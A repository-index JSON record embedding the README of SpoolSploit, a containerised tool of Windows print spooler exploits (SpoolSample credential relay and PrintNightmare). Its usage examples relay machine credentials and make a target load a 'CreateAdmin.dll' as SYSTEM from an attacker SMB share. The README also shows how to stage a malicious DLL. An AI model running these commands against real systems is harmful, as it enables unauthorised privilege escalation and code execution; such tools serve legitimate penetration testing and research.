{"id":13510821,"url":"https://github.com/BeetleChunks/SpoolSploit","last_synced_at":"2025-03-30T17:31:28.531Z","repository":{"id":44409378,"uuid":"383631190","full_name":"BeetleChunks/SpoolSploit","owner":"BeetleChunks","description":"A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","archived":false,"fork":false,"pushed_at":"2021-07-16T04:49:43.000Z","size":2781,"stargazers_count":551,"open_issues_count":0,"forks_count":90,"subscribers_count":17,"default_branch":"main","last_synced_at":"2024-11-01T11:35:09.438Z","etag":null,"topics":["container","cve-2021-1675","cve-2021-34527","docker","exploit","print","printspooler","python","rpc","scanner","spool","vulnerabilities","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BeetleChunks.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-07-07T00:32:28.000Z","updated_at":"2024-10-28T18:14:23.000Z","dependencies_parsed_at":"2022-07-11T04:00:24.841Z","dependency_job_id":null,"html_url":"https://github.com/BeetleChunks/SpoolSploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BeetleChunks","download_url":"https://codeload.github.com/BeetleChunks/SpoolSploit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246355384,"owners_count":20763990,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["container","cve-2021-1675","cve-2021-34527","docker","exploit","print","printspooler","python","rpc","scanner","spool","vulnerabilities","windows"],"created_at":"2024-08-01T02:01:55.316Z","updated_at":"2025-03-30T17:31:28.526Z","avatar_url":"https://github.com/BeetleChunks.png","language":"Python","readme":"# SpoolSploit\nA collection of Windows print spooler exploits containerized with other utilities for practical exploitation.\n\n## Summary\nSpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.\n\n![img](./media/SpoolSploit-Usage.PNG)\n\n## Getting Started\nAs of the release date the SpoolSploit Docker container has been tested successfully on the latest versions of ```MacOS```, ```Ubuntu Linux```, and ```Windows 10```.\n\nAlthough not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.\n\n### Create and access the SpoolSploit Docker container\n1. Clone this repository\n```\ngit clone https://github.com/BeetleChunks/SpoolSploit\n```\n2. Build the SpoolSploit Docker container image\n```\ncd SpoolSploit\nsudo docker build -t spoolsploit .\n```\n3. Create and start the SpoolSploit Docker container\n```\nsudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest\n```\n4. Attach to the container\n```\nsudo docker exec -it spoolsploit /bin/bash\n```\n\n### Command-line Usage\n```\nusage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}\n                        Attack type to execute on target(s).\n  -rH RHOST, --rhost RHOST\n                        Remote target IP, CIDR range, or filename (file:\u003cpath\u003e)\n  -rP {139,445}, --rport {139,445}\n                        Remote SMB server port.\n  -lH LHOST, --lhost LHOST\n                        Listening hostname or IP\n  -lS LSHARE, --lshare LSHARE\n                        Staging SMB share (UNC)\n  -d DOMAIN, --domain DOMAIN\n                        Domain for authentication\n  -u USER, --username USER\n                        Username for authentication\n  -p PASSWD, --password PASSWD\n                        Password for authentication\n\nExample - spoolsample:\n  python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10\n\nExample - nightmare:\n  python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10\n```\n\n### SpoolSample - Capture and relay Windows machine account credentials\nThe SpoolSploit Docker container includes [Responder](https://github.com/lgandx/Responder) for relaying machine account hashes obtained from executing the ```spoolsample``` attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"media/SpoolSample.gif\" width=\"75%\"\u003e\n\u003c/p\u003e\n\n### PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM\nIncluded in the SpoolSploit container is an SMB server implemented via [Impacket](https://github.com/SecureAuthCorp/impacket). This server can be used to host malicious DLLs when executing the ```printnightmare``` attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at ```/home/dlogmas/smbserver/smb-v1.conf```.\n\nThe only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is ```/home/dlogmas/smbserver/share/```. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.\n\n```\nsudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/\nsudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'\n```\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"media/PrintNightmare.gif\" width=\"75%\"\u003e\n\u003c/p\u003e\n\n# Disclaimer\nThis proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. I am not responsible or liable for misuse of this code.\n\n# Credits\n## SpoolSample - Microsoft Feature\n- [leechristensen](https://github.com/leechristensen/SpoolSample) discovered the SpoolSample exploit and created a C# POC [SpoolSample](https://github.com/leechristensen/SpoolSample/tree/master/SpoolSample)\n- [3xocyte](https://gist.github.com/3xocyte) created a Python2 SpoolSample POC [dementor](https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#file-dementor-py).\n\n## PrintNightmare - CVE-2021-1675 / CVE-2021-34527\n- [cube0x0](https://github.com/cube0x0) created Python PrintNightmare exploit after implementing the MS-PAR \u0026 MS-RPRN protocols and API calls in [Impacket](https://github.com/SecureAuthCorp/impacket).\n- [Zhiniang Peng](https://twitter.com/edwardzpeng) \u0026 [Xuefeng Li](https://twitter.com/lxf02942370) discovered this exploit.\n","funding_links":[],"categories":["Python","windows"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBeetleChunks%2FSpoolSploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBeetleChunks%2FSpoolSploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBeetleChunks%2FSpoolSploit/lists"}